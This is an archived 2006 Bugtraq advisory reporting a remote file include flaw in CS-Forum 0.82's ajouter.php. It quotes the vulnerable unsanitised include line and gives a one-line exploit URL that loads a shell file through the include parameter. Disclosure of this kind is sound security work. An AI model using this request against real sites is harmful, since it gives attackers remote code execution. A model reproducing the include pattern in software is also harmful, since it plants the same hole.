CS-Forum 0.82 (ajouter.php) Remote File Include Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx, submit@xxxxxxxxxxx
Subject: CS-Forum 0.82 (ajouter.php) Remote File Include Vulnerability
From: "mahmood ali" <mah_k_2000@xxxxxxxxxxx>
Date: Wed, 18 Oct 2006 11:35:18 +0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

###########################################
CS-Forum 0.82 (ajouter.php) Remote File Include Vulnerability
###########################################

Source Code:
http://www.comscripts.com/jump.php?action=script&id=643
###########################################

Vulnerable Code:_
include("$include/footer.php");
###########################################

Exploit :
http://www.vicTim.com/[CS-Forum]/ajouter.php?include=shell.txt?
###########################################

Discoverd By :  Mahmood_ali
Conatact :      mah_k_2000@xxxxxxxxxxx
###########################################

Special Greetings :_  Tryag-Team
###########################################

_________________________________________________________________

The new Windows Live Toolbar helps you guard against viruseshttp://toolbar.live.com/?mkt=en-gb

Prev by Date: TSLSA-2006-0057 - multi
Next by Date: PhpBB<=2.0.10 (groupcp.php) Remote File Include Vulnerability
Previous by thread: TSLSA-2006-0057 - multi
Next by thread: PhpBB<=2.0.10 (groupcp.php) Remote File Include Vulnerability
Index(es):
- Date
- Thread